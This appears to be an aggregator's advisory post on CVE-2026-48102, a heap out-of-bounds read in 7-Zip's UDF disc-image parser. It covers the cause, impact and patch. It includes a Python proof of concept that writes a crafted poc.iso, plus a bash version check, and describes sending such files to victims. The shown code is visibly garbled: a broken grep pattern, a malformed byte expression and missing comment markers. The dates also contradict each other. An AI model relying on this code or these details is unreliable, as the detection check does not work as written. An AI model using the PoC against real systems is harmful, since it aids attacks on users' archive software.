Listen to this Post
CVE-2026-48102
Intro – CVE-2026-48102 is a heap out-of-bounds read vulnerability in 7-Zip’s UDF disc image handler, affecting versions 9.11 through 26.00. The flaw resides in `CFileId::Parse` (file CPP/7zip/Archive/Udf/UdfIn.cpp). The parser processes a File Identifier Descriptor (FID) with fields `idLen` (identifier length) and `impLen` (implementation use length). After validating that the total size is < 38 + idLen + impLen, the function advances a `processed` pointer to 38 + impLen + idLen. Then, an alignment loop reads `p
` up to three times to reach a 4‑byte boundary. The bounds check `processed <= size` is performed only after the loop.
If `(38 + impLen + idLen) % 4 != 0` and `38 + impLen + idLen == size` (i.e., the buffer is exactly the size needed for the FID header and its payload), the loop reads 1–3 bytes past the end of the heap buffer allocated with <code>buf.Alloc((size_t)item.Size)</code>. This occurs because the buffer has no room for the padding bytes. The UDF handler is registered for `.iso` and `.udf` files and auto‑detected by signature. The out‑of‑bounds read triggers during `Open()` when a crafted UDF image is listed or extracted.
The impact is limited: an attacker can obtain a 1‑bit oracle per OOB byte by observing whether the open/extract operation succeeds or fails (information disclosure). Under hardened memory allocators (e.g., ones that guard heap boundaries), the access may cause a crash (denial of service). No write primitive is available, so arbitrary code execution is not possible. Version 26.01 fixes the issue by adding an extra bounds check inside the alignment loop.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: 7-Zip
Version: 9.11-26.00
Vulnerability: Heap OOB read
Severity: Low
date: 2026-06-05
<h2 style="color: blue;">Prediction: 2026-05-22 (26.01)</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
[bash]
Check installed 7-Zip version (Linux / Windows WSL)
7z | head -n 1 | grep -oP 'Version \K[0-9.]+'
Quick detection script for CVE-2026-48102
if 7z 2>&1 | grep -q "Version 2[bash]"; then
echo "Vulnerable: 7-Zip 9.11–26.00 (CVE-2026-48102) → upgrade to 26.01+"
else
echo "Not vulnerable or already patched."
fi
Minimal Python script to generate a malformed UDF image triggering the OOB read
import struct, os
UDF volume recognition sequence (16 bytes)
vol_rec_seq = b'\x00'16
Malformed File Identifier Descriptor (FID)
TagID=0x0101, idLen=1, impLen=0 → size = 38+1+0 = 39 bytes
(38+1+0) % 4 = 3 → loop reads 3 OOB bytes
fid = struct.pack('<HHI', 0x0101, 0x00, 39) + b'\x00'30 + b'\x01'1 + b'\x00'0
with open('poc.iso', 'wb') as f:
f.write(vol_rec_seq + fid)
print("[] Created poc.iso. Run: 7z l poc.iso (expected crash/leak on vulnerable 7-Zip)")
Exploit:
No public exploit exists. However, a remote attacker can send a specially crafted `.iso` or `.udf` file (e.g., via email, download, or network share). When the victim lists or extracts the archive, the OOB read occurs. The attacker can probe the leaked bytes by observing whether 7‑Zip successfully opens the file (1‑bit oracle per byte). A deterministic crash may also be induced.
Protection:
Upgrade to 7‑Zip 26.01 or later. If immediate update is not possible, disable automatic parsing of UDF images (e.g., avoid opening untrusted `.iso` / `.udf` files). For developers using the 7‑Zip library, apply the patch from the upstream commit that adds the missing bounds check inside the alignment‑padding loop.
Impact:
– Information Disclosure: Up to 3 bytes of heap memory can be leaked per crafted file, potentially exposing sensitive data (e.g., other file names, buffer contents).
– Denial of Service: Under hardened allocators (like those with guard pages), the out‑of‑bounds read leads to a segmentation fault and application crash.
– No Code Execution: The vulnerability is read‑only; there is no write primitive, so arbitrary code execution is not achievable.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
